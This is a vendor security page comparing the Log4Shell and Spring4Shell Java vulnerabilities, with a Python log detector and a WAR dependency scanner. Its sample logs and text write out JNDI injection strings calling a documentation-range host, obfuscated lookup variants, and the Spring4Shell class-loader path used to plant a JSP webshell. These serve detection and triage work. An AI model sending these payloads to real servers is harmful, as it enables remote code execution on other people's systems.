Java · RCE · Supply Chain

Log4Shell vs Spring4Shell

Verified by Precogs Threat Research

Two "Shell" vulnerabilities in the Java ecosystem, disclosed a few months apart. The media initially framed Spring4Shell as a "second Log4Shell." In reality, their risk profiles differ enormously, and the naming similarity created confusion that cost security teams valuable triage time. Understanding why requires examining their exploitation prerequisites.

CVE · 2021

Log4Shell

CVE-2021-44228
CVSS 10.0 CRITICAL
Attack Vector: Network. Any attacker-controlled string that reaches a log statement (a header, a username, a URL) is expanded by Log4j's lookup feature; `${jndi:ldap://...}` makes the server fetch and load a remote object.
Impact: Unauthenticated RCE on any Java application that logs attacker-controlled input through log4j-core 2.x with lookups enabled.
Affected Systems: Apache Log4j 2.0-beta9 through 2.14.1 (log4j-core). Fixed in 2.15.0, with follow-up fixes in 2.16.0 and 2.17.1; 2.12.2 and 2.3.1 are the back-ports for Java 7 and Java 6.
Exploit Availability: Trivial. One string in a request header; weaponized within hours of disclosure in December 2021.
Remediation Complexity: Medium. Upgrading log4j-core is easy, but it is usually a transitive dependency, so finding every copy (nested, shaded and vendored jars) is the hard part. Emergency mitigation: delete JndiLookup.class from the jar.
Real-World Impact: Massive global exploitation campaign within days, from crypto-miners and botnets to nation-state actors.
VS
CVE · 2022

Spring4Shell

CVE-2022-22965
CVSS 9.8 CRITICAL
Attack Vector: Network. An HTTP request whose parameter names walk Spring MVC data binding from the bound object into the class loader (`class.module.classLoader.resources.context.parent.pipeline.first.*`).
Impact: RCE. The public exploit reconfigures Tomcat's access-log valve to write a JSP webshell into the webroot, which only works under specific deployment conditions.
Affected Systems: Spring Framework 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 (older, out-of-support branches are also affected). The published exploit requires JDK 9 or later and a WAR deployed on Apache Tomcat.
Exploit Availability: Public PoC available, but it requires the precise conditions above; other exploit chains were considered possible but none were published.
Remediation Complexity: Low. Upgrade to Spring Framework 5.3.18 or 5.2.20 (Spring Boot 2.6.6 or 2.5.12). Workaround: a @ControllerAdvice that adds the patterns "class.*", "Class.*", "*.class.*" and "*.Class.*" to WebDataBinder.setDisallowedFields.
Real-World Impact: Limited mass exploitation because of the prerequisites. Mostly opportunistic scanning and targeted attacks.
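Both attack vectors above leave recognisable traces in HTTP request logs, and the first thing a triage team needed in December 2021 and March 2022 was a detector that was not fooled by the obfuscation scanners used. The following is an added example of ours, not Precogs code: it percent-decodes each line (twice, for double encoding), collapses the nested Log4j lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) to their literal values, and then flags the `${jndi:` lookup and the Spring4Shell class-loader binding path. The log lines are constructed for the example; 203.0.113.0/24 is a documentation address range.

```python
"""Flag Log4Shell and Spring4Shell exploitation attempts in HTTP request logs (added example)."""
import re
from urllib.parse import unquote

# Log4j lookup obfuscations seen in the wild: ${lower:j} -> j, ${::-j} -> j, ${env:NOPE:-j} -> j
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:")
# Spring4Shell: data-binding path from a request parameter name into the class loader
_CLASSLOADER_PATH = re.compile(r"class\.(?:module\.)?classloader")


def normalize(text):
    """Percent-decode (repeated, for double encoding), resolve nested lookups innermost-first, lowercase."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        resolved = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text.lower()


def classify(line):
    """Return the CVE identifiers whose exploit signature appears in one log line."""
    text = normalize(line)
    hits = []
    if _JNDI.search(text):
        hits.append("CVE-2021-44228")
    if _CLASSLOADER_PATH.search(text):
        hits.append("CVE-2022-22965")
    return hits


def scan(lines):
    """(line index, matched CVEs) for every line that carries a signature."""
    results = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:14:02 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [11/Dec/2021:02:33:19 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F'
    '203.0.113.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.7 - - [12/Dec/2021:04:01:44 +0000] "GET /api HTTP/1.1" 200 88 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/c}"',
    '10.0.0.8 - - [31/Mar/2022:09:12:00 +0000] "GET /app/?class.module.classLoader.resources.context.'
    'parent.pipeline.first.pattern=%25%7Bc2%7Di HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [31/Mar/2022:09:12:01 +0000] "GET /app/?class%2Emodule%2EclassLoader%2Eresources'
    '%2Econtext%2Eparent%2Epipeline%2Efirst%2Esuffix=.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [31/Mar/2022:09:13:00 +0000] "GET /static/app.js HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for index, cves in scan(SAMPLE_LOG):
        print(index, cves)
```

Two caveats for production use. The Log4Shell string can arrive in any field that gets logged, not just the User-Agent, which is why the detector scans the whole line rather than one column. And the Spring4Shell PoC usually sends its parameters in a POST body, which a plain access log never records; you need request logging from the application, a reverse proxy or a WAF that captures parameter names to see it.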

🏆 Verdict

Log4Shell is far more dangerous by every measurable metric. The published Spring4Shell exploit needs four conditions at once: Spring MVC (or WebFlux) data binding, JDK 9 or later, Apache Tomcat as the servlet container, and WAR packaging rather than the far more common Spring Boot executable JAR with embedded Tomcat. That limits its attack surface to a minority of Spring applications (our estimate: 5-10%). Log4Shell, by contrast, works against virtually any Java application that logs untrusted input through log4j-core 2.x, which we estimate covers roughly 35% of Java applications globally, and it needs no knowledge of the target's stack beyond guessing which request fields get logged. Log4Shell was exploited by state-sponsored groups including Aquatic Panda and Hafnium within weeks of disclosure; Spring4Shell saw mostly opportunistic scanning with few confirmed compromises.
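Most of the prerequisites in the verdict can be checked from the build artifact before anyone touches a running host. The following is an added example of ours, not the Precogs scanner: it opens a WAR, walks WEB-INF/lib, reads the Maven pom.properties of log4j-core and of spring-webmvc/spring-webflux, applies the affected-version ranges, and checks whether JndiLookup.class is still inside the Log4j jar (the emergency mitigation was to delete it). The WAR it scans is constructed in memory as a fixture. The runtime JDK and servlet container are facts the artifact cannot prove, so the assessment says so.

```python
"""Scan a WAR for the Log4Shell and Spring4Shell prerequisites visible in the artifact (added example)."""
import io
import re
import zipfile

LOG4J_CORE_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
SPRING_WEB_PROPS = (
    "META-INF/maven/org.springframework/spring-webmvc/pom.properties",
    "META-INF/maven/org.springframework/spring-webflux/pom.properties",
)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:alpha|beta|rc|m)(\d+))?", re.IGNORECASE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 999); '2.0-beta9' -> (2, 0, 0, 9). Pre-releases sort before the final."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), int(pre) if pre else 999)


def log4j_core_vulnerable(v):
    """CVE-2021-44228: log4j-core 2.0-beta9 through 2.14.1; 2.3.1+ (Java 6) and 2.12.2+ (Java 7) are patched back-ports."""
    if v is None or not ((2, 0, 0, 9) <= v < (2, 15, 0, 0)):
        return False
    if v[:2] == (2, 3) and v >= (2, 3, 1, 0):
        return False
    if v[:2] == (2, 12) and v >= (2, 12, 2, 0):
        return False
    return True


def spring_vulnerable(v):
    """CVE-2022-22965: fixed in 5.3.18 and 5.2.20; older, out-of-support branches are affected too."""
    if v is None or v >= (5, 3, 18, 0):
        return False
    if (5, 2, 0, 0) <= v < (5, 3, 0, 0):
        return v < (5, 2, 20, 0)
    return True


def _read_version(jar, props_entry):
    for line in jar.read(props_entry).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return ""


def scan_war(war_bytes):
    """Walk WEB-INF/lib/*.jar inside the WAR and record what each relevant jar reveals."""
    findings = {"is_war": False, "log4j_core": None, "spring_web": None}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        names = war.namelist()
        findings["is_war"] = any(n.startswith("WEB-INF/") for n in names)
        for name in names:
            if not (name.startswith("WEB-INF/lib/") and name.endswith(".jar")):
                continue
            with zipfile.ZipFile(io.BytesIO(war.read(name))) as jar:
                entries = set(jar.namelist())
                if LOG4J_CORE_PROPS in entries:
                    version = _read_version(jar, LOG4J_CORE_PROPS)
                    findings["log4j_core"] = {
                        "jar": name, "version": version,
                        "vulnerable_version": log4j_core_vulnerable(parse_version(version)),
                        # The emergency hot-fix was to delete this class from the jar.
                        "jndi_lookup_present": JNDI_LOOKUP_CLASS in entries,
                    }
                for props in SPRING_WEB_PROPS:
                    if props in entries:
                        version = _read_version(jar, props)
                        findings["spring_web"] = {
                            "jar": name, "version": version,
                            "vulnerable_version": spring_vulnerable(parse_version(version)),
                        }
    return findings


def assess(findings):
    """CVEs this artifact is exposed to, as far as the artifact alone can show."""
    exposed = []
    l4j = findings["log4j_core"]
    if l4j and l4j["vulnerable_version"] and l4j["jndi_lookup_present"]:
        exposed.append("CVE-2021-44228")
    spring = findings["spring_web"]
    # WAR packaging is one prerequisite; JDK 9+ and Tomcat must be confirmed on the host.
    if spring and spring["vulnerable_version"] and findings["is_war"]:
        exposed.append("CVE-2022-22965")
    return exposed


def _jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


def build_sample_war():
    """Constructed fixture: a WAR bundling log4j-core 2.14.1 and spring-webmvc 5.3.17 (both affected)."""
    log4j = _jar({LOG4J_CORE_PROPS: "version=2.14.1\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
                  JNDI_LOOKUP_CLASS: b"\xca\xfe\xba\xbe"})  # placeholder bytes, not a real class file
    spring = _jar({SPRING_WEB_PROPS[0]: "version=5.3.17\ngroupId=org.springframework\nartifactId=spring-webmvc\n"})
    return _jar({"WEB-INF/web.xml": "<web-app/>",
                 "WEB-INF/lib/log4j-core-2.14.1.jar": log4j,
                 "WEB-INF/lib/spring-webmvc-5.3.17.jar": spring})


if __name__ == "__main__":
    result = scan_war(build_sample_war())
    print(result)
    print("exposed:", assess(result))
```

The version rules are the part worth reading twice: Log4j's 2.3.x and 2.12.x back-ports mean a plain "less than 2.15.0" test produces false positives, and Spring's 5.2.x branch has its own fix level. One limitation to keep in mind: shaded or uber jars that copy Log4j classes in without the Maven pom.properties would be missed by the version lookup, so a second pass that searches every jar for JndiLookup.class by name is worth adding.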

🔍 Key Insights

1. The name "Spring4Shell" was coined on Twitter before the vulnerability had been analysed, and it was immediately conflated with CVE-2022-22963, a separate SpEL injection in Spring Cloud Function disclosed the same week. Spring confirmed CVE-2022-22965 on 31 March 2022, after a proof of concept leaked by a Chinese-language researcher had circulated on social media for two days. Social-media-driven disclosure accelerates vulnerability triage, but it also distorts it.

2. Spring4Shell is a revival of CVE-2010-1622. In 2010 Spring blocked data binding into `class.classLoader`; JDK 9 introduced `java.lang.Module`, reachable from any bound object as `class.module.classLoader`, a path the old check did not cover. The public exploit binds through it into Tomcat's access-log valve (`class.module.classLoader.resources.context.parent.pipeline.first.pattern`, `.suffix`, `.directory`, `.prefix`) so that the access log itself writes a JSP into the webroot. Spring 5.3.18 and 5.2.20 fix the root cause instead of the path: only `name` is exposed on `Class`, and binding into `ClassLoader` and `ProtectionDomain` properties is refused outright.

3. This comparison illustrates a recurring security-team problem: vulnerability naming hype misallocates resources. Organizations that deprioritised unfinished Log4Shell remediation to chase Spring4Shell, because that was what the headlines covered at the time, left themselves exposed to the significantly higher real risk.

At a Glance

Attribute | Log4Shell | Spring4Shell
Severity | CRITICAL (CVSS 10.0) | CRITICAL (CVSS 9.8)
Category | Remote Code Execution | Remote Code Execution
Year | 2021 | 2022
Remediation | Medium | Low
Precogs Domain | AI Code | AI Code

Detect Both in Your Codebase

Precogs AI scans source code, compiled binaries, and AI-generated code for both vulnerability classes — automatically.
